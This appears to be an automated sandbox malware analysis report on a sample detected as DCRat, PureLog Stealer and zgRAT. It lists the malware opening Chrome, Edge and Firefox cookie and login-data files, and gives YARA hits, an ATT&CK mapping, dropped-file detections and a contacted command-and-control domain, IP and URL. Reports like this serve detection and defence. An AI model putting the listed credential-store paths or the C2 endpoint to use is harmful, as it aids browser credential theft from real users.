                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

                              Remote Access Functionality

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 0.2.s5duotgoYD.exe.131da5f8.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.1812029430.0000000013178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: s5duotgoYD.exe PID: 7416, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 8240, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: s5duotgoYD.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.s5duotgoYD.exe.b80000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1674094332.0000000000B82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Recovery\xKVBpkhCEjg.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\ModemLogs\conhost.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: s5duotgoYD.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.s5duotgoYD.exe.b80000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Recovery\xKVBpkhCEjg.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\ModemLogs\conhost.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting                              		Valid Accounts241
                              Windows Management Instrumentation                              		1
                              Scripting                              		1
                              DLL Side-Loading                              		11
                              Disable or Modify Tools                              		1
                              OS Credential Dumping                              		2
                              File and Directory Discovery                              		1
                              Taint Shared Content                              		11
                              Archive Collected Data                              		1
                              Encrypted Channel                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault AccountsScheduled Task/Job1
                              DLL Side-Loading                              		11
                              Process Injection                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory144
                              System Information Discovery                              		Remote Desktop Protocol1
                              Data from Local System                              		2
                              Non-Application Layer Protocol                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAt31
                              Registry Run Keys / Startup Folder                              		31
                              Registry Run Keys / Startup Folder                              		2
                              Obfuscated Files or Information                              		Security Account Manager351
                              Security Software Discovery                              		SMB/Windows Admin Shares1
                              Clipboard Data                              		12
                              Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                              Software Packing                              		NTDS1
                              Process Discovery                              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              DLL Side-Loading                              		LSA Secrets271
                              Virtualization/Sandbox Evasion                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              File Deletion                              		Cached Domain Credentials1
                              Application Window Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items133
                              Masquerading                              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job271
                              Virtualization/Sandbox Evasion                              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                              Process Injection                              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554055 Sample: s5duotgoYD.exe Startdate: 12/11/2024 Architecture: WINDOWS Score: 100 70 500154cm.n9shteam.in 2->70 74 Suricata IDS alerts for network traffic 2->74 76 Found malware configuration 2->76 78 Antivirus detection for URL or domain 2->78 80 15 other signatures 2->80 8 s5duotgoYD.exe 13 34 2->8         started        12 RuntimeBroker.exe 2->12         started        14 xKVBpkhCEjg.exe 2->14         started        16 11 other processes 2->16 signatures3 process4 dnsIp5 52 C:\Windows\twain_32\xKVBpkhCEjg.exe, PE32 8->52 dropped 54 C:\Windows\ModemLogs\conhost.exe, PE32 8->54 dropped 56 C:\Users\user\Desktop\vNwKfKje.log, PE32 8->56 dropped 58 14 other malicious files 8->58 dropped 86 Creates an undocumented autostart registry key 8->86 88 Creates multiple autostart registry keys 8->88 90 Drops executables to the windows directory (C:\Windows) and starts them 8->90 102 3 other signatures 8->102 19 cmd.exe 8->19         started        21 csc.exe 4 8->21         started        25 powershell.exe 8->25         started        27 6 other processes 8->27 92 Antivirus detection for dropped file 12->92 94 Multi AV Scanner detection for dropped file 12->94 96 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->96 98 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 12->98 100 Machine Learning detection for dropped file 14->100 68 127.0.0.1 unknown unknown 16->68 file6 signatures7 process8 file9 29 RuntimeBroker.exe 19->29         started        44 3 other processes 19->44 50 C:\Windows\...\SecurityHealthSystray.exe, PE32 21->50 dropped 82 Infects executable files (exe, dll, sys, html) 21->82 34 conhost.exe 21->34         started        36 cvtres.exe 1 21->36         started        84 Loading BitLocker PowerShell Module 25->84 46 2 other processes 25->46 38 conhost.exe 27->38         started        40 conhost.exe 27->40         started        42 conhost.exe 27->42         started        48 2 other processes 27->48 signatures10 process11 dnsIp12 72 500154cm.n9shteam.in 37.44.238.250, 49731, 49733, 49735 HARMONYHOSTING-ASFR France 29->72 60 C:\Users\user\Desktop\vlWcZFKy.log, PE32 29->60 dropped 62 C:\Users\user\Desktop\pkWDNnmN.log, PE32 29->62 dropped 64 C:\Users\user\Desktop\cZuWGjpj.log, PE32 29->64 dropped 66 3 other malicious files 29->66 dropped 104 Tries to harvest and steal browser information (history, passwords, etc) 29->104 file13 signatures14

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              s5duotgoYD.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              s5duotgoYD.exe100%AviraHEUR/AGEN.1323342
                              s5duotgoYD.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Recovery\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\AppData\Local\Temp\TCq2JLUA0X.bat100%AviraBAT/Delbat.C
                              C:\Users\user\Desktop\UAuXMqPf.log100%AviraTR/PSW.Agent.qngqt
                              C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\XIsgiJJb.log100%AviraTR/AVI.Agent.updqb
                              C:\Users\user\Desktop\WgRxdDkv.log100%AviraTR/PSW.Agent.qngqt
                              C:\Recovery\xKVBpkhCEjg.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\CjKcCUFn.log100%Joe Sandbox ML
                              C:\Recovery\RuntimeBroker.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\UAuXMqPf.log100%Joe Sandbox ML
                              C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\WgRxdDkv.log100%Joe Sandbox ML
                              C:\Recovery\xKVBpkhCEjg.exe100%Joe Sandbox ML
                              C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Recovery\RuntimeBroker.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Recovery\xKVBpkhCEjg.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\CjKcCUFn.log8%ReversingLabs
                              C:\Users\user\Desktop\SlQgWXuB.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\UAuXMqPf.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\WgRxdDkv.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\XIsgiJJb.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\cZuWGjpj.log4%ReversingLabs
                              C:\Users\user\Desktop\kZSUvzow.log8%ReversingLabs
                              C:\Users\user\Desktop\mjoVvRUx.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\pkWDNnmN.log24%ReversingLabs
                              C:\Users\user\Desktop\vEZKvYQi.log24%ReversingLabs
                              C:\Users\user\Desktop\vNwKfKje.log4%ReversingLabs
                              C:\Users\user\Desktop\vlWcZFKy.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Windows\ModemLogs\conhost.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Windows\twain_32\xKVBpkhCEjg.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              http://500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php100%Avira URL Cloudmalware

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              500154cm.n9shteam.in
                              		37.44.238.250
                              		truetrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.phptrue
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabgbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drfalse
                                  		high
                                  http://nuget.org/NuGet.exepowershell.exe, 00000016.00000002.3045203135.000001B890078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3239915515.000001F66EA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3090748741.000001F2B1C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3078390875.0000025A50FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3141047160.00000234E2CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drfalse
                                      		high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icogbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drfalse
                                        		high
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001E.00000002.1866487790.00000234D2E89000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000016.00000002.1851720872.000001B880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1923272794.000001F65EBD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1864937137.000001F2A1DF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1911427610.00000297C7708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1894522833.0000025A41158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1866487790.00000234D2E89000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001E.00000002.1866487790.00000234D2E89000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Licensepowershell.exe, 0000001E.00000002.3141047160.00000234E2CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Iconpowershell.exe, 0000001E.00000002.3141047160.00000234E2CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
